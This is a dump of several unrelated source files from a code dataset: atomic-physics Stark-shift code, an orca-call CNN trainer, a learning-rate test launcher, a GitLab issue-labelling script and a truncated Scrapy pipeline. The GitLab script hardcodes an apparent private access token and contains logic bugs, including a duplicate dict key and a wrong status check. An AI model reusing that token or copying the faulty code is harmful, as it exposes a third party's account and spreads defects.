* I/self.Isats[i] / (1 + 4*(deltas/self.Dlws[i])**2 + I/self.Isats[i])\r\n\r\n return Rsc\r\n \r\n def acStarkShift(self, x=0, y=0, z=0, wavel=[], mj=None, HF=False):\r\n \"\"\"Return the potential from the dipole interaction:\r\n U = -1/2 <d.E> = -1/2 Re[alpha] E^2.\r\n Then taking the time average of the cos^2(wt) AC field term we get \r\n U = -1/4 Re[alpha] E^2\"\"\"\r\n return -self.polarisability(wavel, mj, HF, split=False) /4. *np.abs( \r\n self.field.amplitude(x,y,z) )**2\r\n \r\n \r\n def polarisability(self, wavel=[], mj=None, HF=False, split=False):\r\n \"\"\"wavel: wavelength (m) - default is self.field.lam\r\n mj: used when hyperfine splitting is negligible.\r\n HF: Boolean - include hyperfine structure\r\n split: Boolean - False gives total polarisability, True splits into\r\n scalar, vector, and tensor.\r\n Return the polarisability as given in Arora 2007 (also see Cooper 2018,\r\n Mitroy 2010, Kien 2013) assuming that J and mj are good quantum \r\n numbers when hyperfine splitting can be neglected, or that F and mf are\r\n good quantum numbers. Assumes linear polarisation so that the vector\r\n polarisability is zero.\"\"\"\r\n if np.size(wavel) != 0: \r\n omegas = np.array(2*np.pi*c/wavel) # laser frequencies (rad/s)\r\n else:\r\n omegas = self.omegas\r\n \r\n # initialise arrays for results\r\n empty = np.zeros(np.size(omegas))\r\n aSvals, aVvals, aTvals = empty.copy(), empty.copy(), empty.copy()\r\n \r\n for ii in range(np.size(omegas)):\r\n aS, aV, aT = 0, 0, 0\r\n #print([self.omega0.shape,self.gam.shape,omegas.shape])\r\n # loop over final states\r\n for i in range(len(self.states)): \r\n if np.size(omegas) > 1:\r\n Ep = hbar*(self.omega0[i] + omegas[ii] + 1j*self.gam[i])\r\n Em = hbar*(self.omega0[i] - omegas[ii] - 1j*self.gam[i])\r\n \r\n else:\r\n Ep = hbar*(self.omega0[i] + omegas + 1j*self.gam[i])\r\n Em = hbar*(self.omega0[i] - omegas - 1j*self.gam[i])\r\n \r\n aS += 1/3. /(2.*self.J + 1.) *self.D0s[i]**2 * (1/Ep + 1/Em)\r\n \r\n aV += 0.5*(-1)**(self.J + 2 + self.states[i][2]) * np.sqrt(6*self.J\r\n /(self.J + 1.) /(2*self.J + 1.)) * self.D0s[i]**2 * wigner6j(\r\n 1, 1, 1, self.J, self.states[i][2], self.J) * (1/Em - 1/Ep)\r\n \r\n aT += 2*np.sqrt(5 * self.J * (2*self.J - 1) / 6. 
/(self.J + 1) /\r\n (2*self.J + 1) / (2*self.J + 3)) * (-1)**(self.J + \r\n self.states[i][2]) * wigner6j(self.J, 1, self.states[i][2], \r\n 1, self.J, 2) * self.D0s[i]**2 * (1/Ep + 1/Em)\r\n \r\n aSvals[ii] = aS.real # scalar polarisability\r\n aVvals[ii] = aV.real # vector polarisability\r\n aTvals[ii] = aT.real # tensor polarisability\r\n\r\n # combine polarisabilities\r\n u = self.field.ehat\r\n if self.J > 0.5:\r\n if HF: # hyperfine splitting is significant\r\n # from Kien 2013: when the Stark shift << hfs splitting there isn't mixing of F levels\r\n # combine eq 16 and 18 to get the a_nJF in terms of the a_nJ\r\n # also assume Stark shift << Zeeman splitting so we can use |F,MF> states.\r\n aVvals *= -(-1)**(self.J + self.I + self.F) * np.sqrt(self.F * (2*self.F + 1)\r\n *(self.J + 1) *(2*self.J + 1) /self.J /(self.F + 1)) *wigner6j(self.F, 1, self.F, \r\n self.J, self.I, self.J)\r\n \r\n # from Arora 2007\r\n aTvals *= (-1)**(self.I + self.J - self.MF) * (2*self.F + 1\r\n ) * np.sqrt((self.J + 1) *(2*self.J + 1) *(2*self.J + 3)\r\n /self.J /(2*self.J - 1.)) * wigner3j(self.F, 2, self.F, \r\n self.MF, 0, -self.MF) * wigner6j(self.F, 2, self.F,\r\n self.J, self.I, self.J) \r\n \r\n if split:\r\n return (aSvals, aVvals, aTvals)\r\n else: \r\n return aSvals + aTvals\r\n \r\n else: # hyperfine splitting is ignored\r\n # NB: currently ignoring vector polarisability as in Arora 2007\r\n if split:\r\n return (aSvals, aVvals, aTvals)\r\n else:\r\n # return aSvals + aTvals * (3*mj**2 - self.J*(self.J + 1)\r\n # ) / self.J / (2*self.J - 1)\r\n # include a general polarisation of light:\r\n return aSvals + mj/self.J * np.imag(np.conj(u[0])*u[1]\r\n ) * aVvals + (3*abs(u[2])**2 - 1)/2. * (3*mj**2 - \r\n self.J*(self.J + 1)) / self.J / (2*self.J - 1) * aTvals\r\n else:\r\n if HF: # there is no tensor polarisability for the J=1/2 state\r\n aVvals *= -(-1)**(self.J + self.I + self.F) * np.sqrt(self.F * (2*self.F + 1)\r\n *(self.J + 1) *(2*self.J + 1) /self.J /(self.F + 1)) *wigner6j(self.F, 1, self.F, \r\n self.J, self.I, self.J)\r\n if split:\r\n return (aSvals, aVvals, aTvals)\r\n else:\r\n return aSvals #+ aVvals\r\n else:\r\n if split:\r\n return (aSvals, aVvals, aTvals)\r\n else:\r\n if mj is None: # for compatibility with old scripts\r\n mj = 0\r\n return aSvals + mj/self.J*np.imag(np.conj(u[0])*u[1])*aVvals\r\n \r\n def matrix_element(self,f1,m1,f2,m2,q = 0):\r\n \"\"\"\r\n Calculate the gI*I + gJ*J matrix element for the Zeeman Hamiltonian, using indices as arguments.\r\n :return: The value of < f1,m1| gI*I + gJ*J |f2,m2>\r\n :param q: Spherical tensor rank of the incoming field, should be in [-1, 0, 1]\r\n function taken from https://github.com/cyip92/microwave-dressing.git \r\n The exact expression in the F mF basis can be found in https://arxiv.org/pdf/1309.5775.pdf\r\n \"\"\"\r\n I = self.I\r\n J = self.J\r\n g_I = self.gI\r\n g_J = self.gJ\r\n if abs(f1 - f2) > 1 or abs(m1 - m2) > 1: # Selection rules cut out a lot of time\r\n return 0\r\n reduced = ((-1) ** (1 + I + J)) * np.sqrt(2*f1 + 1)\r\n elem_i = ((-1) ** f2) * np.sqrt(I * (I + 1) * (2*I + 1)) * wigner6j(I, J, f1, f2, 1, I)\r\n elem_j = ((-1) ** f1) * np.sqrt(J * (J + 1) * (2*J + 1)) * wigner6j(J, I, f1, f2, 1, J)\r\n elem = ((-1) ** q) * reduced * (g_I * elem_i + g_J * elem_j) * clebschgordan(f1, 1, f2, m1, q, m2)\r\n return elem \r\n \r\n def diagH(self, x = 0, y = 0, z = 0, Bfield = 0):\r\n \r\n \"\"\"Diagonalise the combined Hamiltonian of hyperfine splitting + the AC\r\n Stark shift + the Zeeman effect. 
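The matrix assembled below is, schematically, H = Hhfs + Hac + HZeeman; only its lower triangle is filled before it is passed to np.linalg.eigh. 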
This gives the eigenenergies and eigenstates in the |F,mF>\r\n basis at a particular wavelength. Currently assuming linear polarisation\r\n along the z direction as in Arora 2007.\"\"\"\r\n wavel = self.field.lam\r\n omega = 2*np.pi*c/wavel # laser frequency in rad/s\r\n \r\n # |I-J| <= F <= I+J\r\n Fs = np.arange(abs(int(self.I - self.J)), int(self.I + self.J + 1)) #List of F states\r\n num_states = sum(2*Fs + 1) #Total number of states.\r\n \r\n H = np.zeros((num_states, num_states)) # Initialize combined interaction Hamiltonian\r\n F_labels = np.concatenate([[F]*(2*F+1) for F in Fs]) #F label of each state\r\n \r\n MF_labels = np.concatenate([list(range(-F,F+1)) for F in Fs]) #m_F label of each state\r\n \r\n Hhfs = np.zeros(num_states) # diagonal elements of the hfs Hamiltonian\r\n # state vector: (|F0 -F0>, |F0 -F0+1>, ..., |F0 F0>, |F1 -F1>, ..., |FN FN>)\r\n for F in Fs:\r\n for MF in range(-F, F+1):\r\n # hyperfine interaction is diagonal in F and mF:\r\n G = F*(F + 1) - self.I*(self.I + 1) - self.J*(self.J + 1)\r\n if self.J == 0.5:\r\n Vhfs = h/2. * self.Ahfs * G # no quadrupole\r\n else:\r\n Vhfs = h/2. * (self.Ahfs * G + self.Bhfs/4. * (3*G*(G + 1)\r\n - 4*self.I*(self.I + 1) * self.J*(self.J + 1)) / self.I\r\n /(2*self.I - 1.) /self.J /(2*self.J - 1.))\r\n \r\n # stark interaction is diagonal in mF\r\n # since the Hamiltonian is Hermitian, we only need to fill the lower triangle\r\n i = 2*F - min(Fs) + MF + np.sum(2*np.arange(min(Fs),F)) # horizontal index of Hamiltonian\r\n \r\n Fps = np.arange(min(Fs), F+1) # F'\r\n \r\n Hhfs[i] = Vhfs\r\n \r\n # not making the rotating wave approximation\r\n Ep = hbar*(self.omega0 + omega + 1j*self.gam)\r\n Em = hbar*(self.omega0 - omega - 1j*self.gam)\r\n \r\n aS = np.sum(self.D0s**2 /3. /(2.*self.J + 1.) * (1/Ep + 1/Em))\r\n \r\n aT = 0\r\n for ii in range(len(self.D0s)): # wigner6j function takes scalars\r\n aT += (-1)**(self.J + self.states[ii][2] + 1\r\n ) * wigner6j(self.J, 1, self.states[ii][2], 1, \r\n self.J, 2) * self.D0s[ii]**2 * (1/Ep[ii] + 1/Em[ii])\r\n \r\n for Fp in Fps:\r\n if Fp >= abs(MF):\r\n # due to symmetry, only some of the matrix elements need filling\r\n j = Fp + MF + np.sum(2*np.arange(min(Fs),Fp) + 1)\r\n \r\n aT_F = aT * 4*np.sqrt(5/6. 
* (2*F + 1) * (2*Fp + 1)) * (-1)**(\r\n self.J + self.I + F - Fp - MF) * wigner3j(F, 2, \r\n Fp, MF, 0, -MF) * wigner6j(F, 2, Fp, self.J, \r\n self.I, self.J)\r\n if F == Fp: \r\n # The hyperfine splitting is diagonal in |F,MF> \r\n H[i,j] = -0.25 * (aS.real + aT_F.real) * np.abs( \r\n self.field.amplitude(x,y,z) )**2 + Vhfs\r\n else: \r\n # state mixing is only from the anisotropic polarisability\r\n H[i,j] = -0.25 * aT_F.real * np.abs( self.field.amplitude(x,y,z) )**2\r\n \r\n #Zeeman Hamiltonian\r\n for Fp in Fps:\r\n for MFp in range(-Fp, Fp+1):\r\n j = 2*Fp - min(Fs) + MFp + np.sum(2*np.arange(min(Fs),Fp)) # vertical index of Hamiltonian\r\n #keep only lower triangle\r\n if j <= i:\r\n #print([F, MF], [Fp, MFp] , [i, j])\r\n H[i,j] = H[i,j] + Bfield*bohr_magneton *self.matrix_element(F,MF,Fp,MFp)\r\n #print(self.matrix_element(F,MF,Fp,MFp)/self.matrix_element(1,0,1,0))\r\n \r\n \r\n # could fill the rest of H from symmetry: # H = H + H.T - np.diagflat(np.diag(H))\r\n # diagonalise the Hamiltonian to find the combined shift\r\n # since it's Hermitian, numpy can diagonalise just from the lower triangle\r\n eigenvalues, eigenvectors = np.linalg.eigh(H, UPLO='L')\r\n \r\n # to get the Stark shift, subtract off the hyperfine shift\r\n Hac = eigenvalues - Hhfs\r\n \r\n # note: the diagonalisation in numpy will likely re-order the eigenvectors\r\n # assume the eigenvector is that closest to the original eigenvector\r\n indexes = np.argmax(abs(eigenvectors), axis=1)\r\n #return Hac[indexes], eigenvectors[:,indexes], Hhfs[indexes], F_labels, MF_labels\r\n return eigenvalues, eigenvectors\r\n \r\n def ufunc(self,K,q,u):\r\n \"\"\"\r\n :param u: spherical components (u_-1, u_0, u_+1) of the light polarisation vector.\r\n Expression is eqn 12 in https://doi.org/10.1140/epjd/e2013-30729-x\r\n \"\"\"\r\n V = 0\r\n vec = [-1,0,1]\r\n for m in vec:\r\n for m1 in vec:\r\n V = V + (-1.00+0j)**(q+m1)*u[m+1]*np.conj(u[-m1+1]+0j)*np.sqrt(2*K+1)*wigner3j(1, K,1, m, -q, m1)\r\n return V\r\n\r\n def alpha_func(self,K):\r\n \"\"\"\r\n Expression is eqn 11 in https://doi.org/10.1140/epjd/e2013-30729-x\r\n \"\"\"\r\n \r\n I = self.I\r\n J = self.J\r\n C = (-1.00+0j)**(K+J+1) * np.sqrt(2*K+1)\r\n wavel = self.field.lam\r\n omega = 2*np.pi*c/wavel # laser frequency in rad/s\r\n alpha = 0 \r\n for ii in range(len(self.D0s)): # sum over all the transitions\r\n Jd = self.states[ii][2]\r\n # not making the rotating wave approximation\r\n Ep = hbar*(self.omega0[ii] + omega + 1j*self.gam[ii])\r\n Em = hbar*(self.omega0[ii] - omega - 1j*self.gam[ii])\r\n alpha += (-1.00+0j)**Jd * wigner6j(1, K, 1, J,Jd,J) * self.D0s[ii]**2 * (((-1)**K)/Ep + 1/Em).real\r\n return C*alpha\r\n \r\n def ac_stark_matrix_element(self,f1,m1,f2,m2,u):\r\n \"\"\"\r\n Exact matrix element for the AC Stark shift. 
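Schematically, V = sum over K in {0,1,2} and q in [-K, K] of alpha_func(K) * ufunc(K,q,u) * (3j and 6j angular factors). 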
This includes all contributions: scalar (K=0), vector (K=1) and tensor (K=2).\r\n :param u: spherical components (u_-1, u_0, u_+1) of the light polarisation vector.\r\n :return: The AC Stark matrix element < f1,m1| V_AC |f2,m2>\r\n Expression is eqn 10 in https://doi.org/10.1140/epjd/e2013-30729-x\r\n \"\"\"\r\n V = 0\r\n I = self.I\r\n J = self.J\r\n \r\n for K in range(3):\r\n for q in np.arange(-K,K+1):\r\n V = V + self.alpha_func(K)*self.ufunc(K,q,u)*(-1.00+0j)**(J+I+K+q-m1)*np.sqrt((2*f1+1)*(2*f2+1))*wigner3j(f1, K,f2, m1, q, -m2) * wigner6j(f1, K, f2, J, I, J)\r\n return V\r\n \r\n def diagHV(self, x = 0, y = 0, z = 0, Bfield = 0, u = [0,1,0]):\r\n \"\"\"Diagonalise the combined Hamiltonian of hyperfine splitting + the AC\r\n Stark shift + the Zeeman effect. This gives the eigenenergies and eigenstates in the |F,mF>\r\n basis at a particular wavelength. This works for an arbitrary polarization of the light. \"\"\"\r\n wavel = self.field.lam\r\n omega = 2*np.pi*c/wavel # laser frequency in rad/s\r\n \r\n # |I-J| <= F <= I+J\r\n Fs = np.arange(abs(int(self.I - self.J)), int(self.I + self.J + 1)) # List of F states\r\n num_states = sum(2*Fs + 1) # Total number of states.\r\n \r\n H = np.zeros((num_states, num_states)) + 0j # Initialize combined interaction Hamiltonian\r\n F_labels = np.concatenate([[F]*(2*F+1) for F in Fs]) # F label of each state\r\n \r\n MF_labels = np.concatenate([list(range(-F,F+1)) for F in Fs]) # m_F label of each state\r\n \r\n Hhfs = np.zeros(num_states) # diagonal elements of the hfs Hamiltonian\r\n # state vector: (|F0 -F0>, |F0 -F0+1>, ..., |F0 F0>, |F1 -F1>, ..., |FN FN>)\r\n for F in Fs:\r\n # hyperfine interaction is diagonal in F and mF:\r\n G = F*(F + 1) - self.I*(self.I + 1) - self.J*(self.J + 1)\r\n if self.J == 0.5:\r\n Vhfs = h/2. * self.Ahfs * G # no quadrupole\r\n #print(self.Ahfs * G/2*1e-6)\r\n else:\r\n Vhfs = h/2. * (self.Ahfs * G + self.Bhfs/4. * (3*G*(G + 1)\r\n - 4*self.I*(self.I + 1) * self.J*(self.J + 1)) / self.I\r\n /(2*self.I - 1.) 
/self.J /(2*self.J - 1.))\r\n #print(Vhfs/h*1e-6)\r\n for MF in range(-F, F+1):\r\n # since the Hamiltonian is Hermitian, we only need to fill the lower triangle\r\n i = 2*F - min(Fs) + MF + np.sum(2*np.arange(min(Fs),F)) # horizontal index of Hamiltonian\r\n \r\n Fps = np.arange(min(Fs), F+1) # F'\r\n \r\n Hhfs[i] = Vhfs\r\n\r\n for Fp in Fps:\r\n for MFp in range(-Fp, Fp+1):\r\n j = 2*Fp - min(Fs) + MFp + np.sum(2*np.arange(min(Fs),Fp)) # vertical index of Hamiltonian\r\n #keep only lower triangle\r\n if j <= i:\r\n \r\n #Zeeman Hamiltonian\r\n H[i,j] = H[i,j] + Bfield*bohr_magneton *self.matrix_element(F,MF,Fp,MFp)\r\n \r\n #AC Stark Hamiltonian\r\n Hac = (1/4.00)*self.ac_stark_matrix_element(F,MF,Fp,MFp,u)* np.abs(self.field.amplitude(x,y,z))**2 \r\n H[i,j] = H[i,j] + Hac\r\n \r\n #print([F, MF], [Fp, MFp] , [i, j])\r\n #print(Hac/h*1e-6)\r\n \r\n # Add hyperfine interaction\r\n if F == Fp and MF == MFp: \r\n # The hyperfine splitting is diagonal in |F,MF> \r\n H[i,j] = H[i,j] + Vhfs\r\n #print([F, MF], [Fp, MFp] , [i, j])\r\n # could fill the rest of H from symmetry: # H = H + H.T - np.diagflat(np.diag(H))\r\n # diagonalise the Hamiltonian to find the combined shift\r\n # since it's Hermitian, numpy can diagonalise just from the lower triangle\r\n eigenvalues, eigenvectors = np.linalg.eigh(H, UPLO='L')\r\n \r\n # to get the Stark shift, subtract off the hyperfine shift\r\n #Hac = eigenvalues - Hhfs\r\n #\r\n # note: the diagonalisation in numpy will likely re-order the eigenvectors\r\n # assume the eigenvector is that closest to the original eigenvector\r\n #indexes = np.argmax(abs(eigenvectors), axis=1)\r\n #return Hac[indexes], eigenvectors[:,indexes], Hhfs[indexes], F_labels, MF_labels\r\n return eigenvalues, eigenvectors\r\n \r\n def zeeman_map(self,Bfield_min=1,Bfield_max=2,Bfield_int=1):\r\n 'Plot the Zeeman map for the magnetic field values (in Gauss) spanned by Bfield_min, Bfield_max and Bfield_int.'\r\n # compare polarisability of excited states\r\n y = []\r\n Bfield_array = np.arange(Bfield_min,Bfield_max,Bfield_int)\r\n for Bfield in Bfield_array:\r\n ev, evec = self.diagHV(Bfield = Bfield*1e-4)\r\n y.append(ev)\r\n X = []\r\n Y = []\r\n for i in range(len(Bfield_array)):\r\n for j in range(len(y[i])):\r\n X.append(Bfield_array[i])\r\n Y.append(y[i][j]/h*1e-9)\r\n plt.figure()\r\n plt.title(\"Zeeman structure of \" + self.X + ' in state [L,J] = ' + str([self.L,self.J]))\r\n plt.scatter(X, Y, s=10, linewidth=0, zorder=2, picker=5)\r\n plt.xlabel(\"Magnetic field (Gauss)\")\r\n plt.ylabel(\"Energy (GHz)\")\r\n\r\nif __name__ == \"__main__\":\r\n # run GUI by passing an arg:\r\n if np.size(sys.argv) > 1 and sys.argv[1] == 'rungui':\r\n AFF.runGUI()\r\n sys.exit() # don't run any of the other code below\r\n Rb = atom(atm = 'Rb87')\r\n AFF.vmfSS(Rb)\r\n\r\n # combinedTrap(Cswl = 1064e-9, # wavelength of the Cs tweezer trap in m\r\n # Rbwl = 810e-9, # wavelength of the Rb tweezer trap in m\r\n # power = 5e-3, # power of Cs tweezer beam in W\r\n # Rbpower = 1e-3, # power of Rb tweezer beam in W \r\n # beamwaist = 1e-6)\r\n #check880Trap(wavels=np.linspace(795, 1100, 400)*1e-9, species='Rb')\r\n\r\n # getMFStarkShifts()\r\n # plotStarkShifts(wlrange=[800,1100])\r\n\r\n # for STATES in [[Rb5S, Rb5P],[Cs6S, Cs6P]]:\r\n # plt.figure()\r\n # plt.title(\"AC Stark Shift in \"+STATES[0].X+\"\\nbeam power %.3g mW, beam waist %.3g $\\mu$m\"%(power*1e3,beamwaist*1e6))\r\n # plt.plot(wavels*1e9, STATES[0].acStarkShift(0,0,0,wavels)/kB*1e3, 'tab:blue', label='Ground S$_{1/2}$')\r\n # excited_shift 
= 0.5*(STATES[1].acStarkShift(0,0,0,wavels,mj=0.5) + STATES[1].acStarkShift(0,0,0,wavels,mj=1.5))\r\n # plt.plot(wavels*1e9, excited_shift/kB*1e3, 'r-.', label='Excited P$_{3/2}$')\r\n # plt.legend()\r\n # plt.ylabel(\"Trap Depth (mK)\")\r\n # plt.xlabel(\"Wavelength (nm)\")\r\n # plt.xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n # plt.ylim(-5,5)\r\n # plt.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.25) # show zero crossing\r\n # plt.show()","sub_path":"AtomFieldInt_V3.py","file_name":"AtomFieldInt_V3.py","file_ext":"py","file_size_in_byte":44121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"553881537","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport os\n\nimport argparse\nimport logging\nimport logging.config\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.layers import Dropout, Flatten, Dense, Activation\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau, ModelCheckpoint\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import Activation, Dropout, Flatten, Dense\nfrom tensorflow.keras import backend as K\n\n# Disable PIL.PngImagePlugin DEBUG logs\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n})\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef train(model, img_width, img_height, train_data_path, validation_data_path):\n '''Train the Detection model'''\n nb_train_samples = sum(len(files)\n for _, _, files in os.walk(train_data_path))\n nb_validation_samples = sum(len(files)\n for _, _, files in os.walk(validation_data_path))\n\n epochs = 250\n batch_size = 256\n checkpoint = ModelCheckpoint(filepath='checkpoint_orcacnn-{epoch:02d}-{val_loss:.2f}.h5',\n monitor='val_loss', verbose=0, save_best_only=True)\n\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1,\n patience=100, min_lr=1e-8)\n\n train_datagen = ImageDataGenerator(rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2)\n\n # only rescaling\n test_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\n # Change the batchsize according to your system RAM\n train_batchsize = 256\n val_batchsize = 256\n\n train_generator = train_datagen.flow_from_directory(\n train_data_path,\n target_size=(img_width, img_height),\n batch_size=train_batchsize,\n class_mode='binary',\n shuffle=True)\n\n validation_generator = test_datagen.flow_from_directory(\n validation_data_path,\n target_size=(img_width, img_height),\n batch_size=val_batchsize,\n class_mode='binary',\n shuffle=False)\n\n model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size,\n callbacks=[checkpoint, reduce_lr])\n\n model.save('orca_detection_adam_.h5')\n\n logger.info(\"Detection Model saved\")\n\n\nclass OrcaNet:\n @staticmethod\n def build(img_width, img_height):\n '''Build CNN for Orca Detection'''\n if K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\n else:\n input_shape = (img_width, img_height, 3)\n\n model = Sequential()\n model.add(Conv2D(32, (5, 5), padding='same', strides=2, input_shape=input_shape))\n model.add(Conv2D(32, (5, 5), padding='same', strides=2))\n model.add(Activation('relu'))\n model.add(Dropout(0.4))\n\n model.add(Conv2D(32, (5, 5), strides=2, padding='same'))\n model.add(Conv2D(32, (5, 5), strides=2, padding='same'))\n model.add(Activation('relu'))\n model.add(Dropout(0.4))\n\n model.add(Conv2D(64, (5, 5), strides=2, padding='same'))\n model.add(Conv2D(64, (5, 5), strides=2, padding='same'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n\n model.add(Conv2D(64, (5, 5), strides=2, padding='same'))\n model.add(Conv2D(64, (5, 5), strides=2, padding='same'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n\n model.add(Flatten())\n model.add(Dense(256))\n model.add(Activation('relu'))\n\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n model.summary()\n\n return model\n\n\ndef main(args):\n dataset_path = args.classpath\n\n train_data_path = os.path.join(dataset_path, 'train_orca/')\n validation_data_path = os.path.join(dataset_path, 'val_orca/')\n\n img_width, img_height = 200, 300\n\n logger.info(\"Starting compiling of OrcaNet ... \")\n model = OrcaNet.build(img_width=img_width, img_height=img_height)\n model.compile(loss='binary_crossentropy',\n optimizer=optimizers.Adam(lr=3e-5),\n metrics=['accuracy'])\n logger.info(\"Starting Training ... 
\")\n train(model=model, img_width=img_width, img_height=img_height, train_data_path=train_data_path,\n validation_data_path=validation_data_path)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(\n description=\"Train CNN model for detection of orca calls in spectrograms\")\n parser.add_argument(\n '-c',\n '--classpath',\n type=str,\n help='directory with pos and neg samples in two respective folders',\n required=True)\n\n args = parser.parse_args()\n\n main(args)\n","sub_path":"app/Detection/orcacnn_detection.py","file_name":"orcacnn_detection.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266045609","text":"import sys\nimport os\nimport datetime\nimport copy\n\nsys.path.append('..')\n\nfrom ..data.dataloader.build import create_dataloader\nfrom ..model.build import build_model\nfrom ..solver.optimizer import create_optimizer\nfrom ..solver.lr_scheduler import wrapper_lr_scheduler\nfrom ..utils.utils import *\nfrom ..engine.lr_range_tester import *\n\n# from data.dataloader import create_dataloader\nfrom ..configs import load_args, merge_from_arg\n\nif __name__ == '__main__':\n\n init_torch_seeds(1)\n\n arg = vars(load_args())\n config_file = arg['config_file']\n\n # configs/resnet50_baseline.py => configs.resnet50_baseline\n config_file = config_file.replace(\"../\", \"\").replace('.py', '').replace('/', '.')\n # print(config_file)\n\n # from configs.resnet50_baseline import config as cfg\n exec(r\"from {} import config as cfg\".format(config_file))\n # print(cfg['tag'], cfg['max_num_devices'])\n\n # 脚本输入参数替换掉字典输入\n cfg = merge_from_arg(cfg, arg)\n cfg_copy = copy.deepcopy(cfg)\n\n train_dataloader = create_dataloader(cfg['train_pipeline'])\n val_dataloader = create_dataloader(cfg['val_pipeline'])\n\n print('train_dataloader: ', len(train_dataloader))\n print('val_dataloader: ', len(val_dataloader))\n\n current_time = datetime.datetime.now()\n time_str = datetime.datetime.strftime(current_time, '%Y%m%d_')\n save_dir = os.path.join(cfg['save_dir'], time_str, cfg['tag'])\n log_dir = os.path.join(cfg['log_dir'], \"log_\" + time_str + cfg['tag'])\n cfg['save_dir'] = save_dir\n cfg['log_dir'] = log_dir\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n if not os.path.isdir(log_dir):\n os.makedirs(log_dir)\n print('Save dir: ', save_dir)\n print('Log dir: ', log_dir)\n\n model = build_model(cfg, pretrain_path=arg['load_path'])\n optimizer = create_optimizer(cfg['optimizer'], model)\n lr_scheduler = wrapper_lr_scheduler(cfg['lr_scheduler'], optimizer)\n\n if arg['device']:\n free_device_ids = arg['device']\n else:\n free_device_ids = get_free_device_ids()\n\n max_num_devices = cfg['max_num_devices']\n if len(free_device_ids) >= max_num_devices:\n free_device_ids = free_device_ids[:max_num_devices]\n\n print('free_device_ids: ', free_device_ids)\n\n master_device = free_device_ids[0]\n model.cuda(master_device)\n model = nn.DataParallel(model, device_ids=free_device_ids).cuda(master_device)\n\n cfg_copy['save_dir'] = save_dir # 更新存储目录\n cfg_copy['log_dir'] = log_dir # 更新存储目录\n\n do_lr_range_test(cfg_copy, model=model, train_loader=train_dataloader, val_loader=val_dataloader, optimizer=optimizer,\n scheduler=lr_scheduler, device=master_device)\n","sub_path":"classification/tools/lr_range_test.py","file_name":"lr_range_test.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 
+{"seq_id":"594928041","text":"import requests\nprivateToken = 'kSeX-psAkxw3NGBabgUy'\nprivateTokenStr = 'private_token={}'.format(privateToken)\nprojectId = 15617391\nprefix = 'https://gitlab.com/api/v4/projects/{}'.format(projectId)\n\ncategories = [\n\t{\n\n\t\t\"label\": {\n \"id\": \"Journal Account\",\n\t\t\t\"name\": \"journal-account\",\n\t\t\t\"color\": \"#3450f6\"\n\t\t},\n \"label\":{\n \"id\":\"Patient Account\",\n \"name\": \"patient-account\",\n \"color\": \"#3450f6\"\n }\n\t}\n]\n\nfor category in categories:\n\tlabel = category.get('label')\n\tresp = requests.post('{}/labels?{}'.format(prefix, privateTokenStr), json = label)\n\tif resp.status_code != 201:\n\t\tif resp.status_code != 409: # Label already exists\n\t\t\traise Exception('POST /labels/: {} - {}'.format(resp.status_code, resp.text))\n\nresp = requests.get('{}/issues?{}'.format(prefix, privateTokenStr))\nif resp.status_code != 201:\n\t\traise Exception('GET /issues/: {} - {}'.format(resp.status_code, resp.text))\n\njsonResp = resp.json()\nif not isinstance(jsonResp, list):\n\tjsonResp = [jsonResp]\n\nfor issue in jsonResp:\n title = issue.get('title')\n serviceDeskStr = 'Service Desk'\n if serviceDeskStr in title:\n for category in categories:\n tag = '[{}]'.format(category.get('id'))\n if tag in title:\n label = category.get('label')\n issueIid = issue.get('id')\n labelName = label.get('name')\n assignLabels = issue.get('labels')\n if not labelName in assignLabels:\n assignLabels.append(label.get('name'))\n updateData = { \"labels\": assignLabels }\n resp = requests.put('{}/issues/{}?{}'.format(prefix,\n\t\t\t\t\tissueIid, privateTokenStr), json=updateData)\n if resp.status_code != 200:\n raise Exception('PUT /issues/{}/: {} - {}'.format(issueIid,\n\t\t\t\t\t\tresp.status_code, resp.text))","sub_path":"app/support/gitlab-tickets.py","file_name":"gitlab-tickets.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"352575216","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom hashlib import md5\nimport json\nfrom twisted.enterprise import adbapi\nfrom scrapy import log\nfrom scrapy.utils.project import get_project_settings\n\nfrom sweep.utils import get_string, EMAIL_REGEX, URL_REGEX\n\n\nsettings = get_project_settings()\n\n\nclass SweepPipeline(object):\n \"\"\"A pipeline to store the item in a json format\n \"\"\"\n def __init__(self):\n self.file = open('items.json', 'wb')\n\n def process_item(self, item, spider):\n line = json.dumps(dict(item)) + \"\\n\"\n self.file.write(line)\n return item\n\n\nclass CleanPipeline(object):\n \"\"\"A pipeline to clean item\n \"\"\"\n def __init__(self):\n pass\n\n def process_item(self, item, spider):\n for key, value in dict(item).iteritems():\n if key == \"email\":\n item[key] = 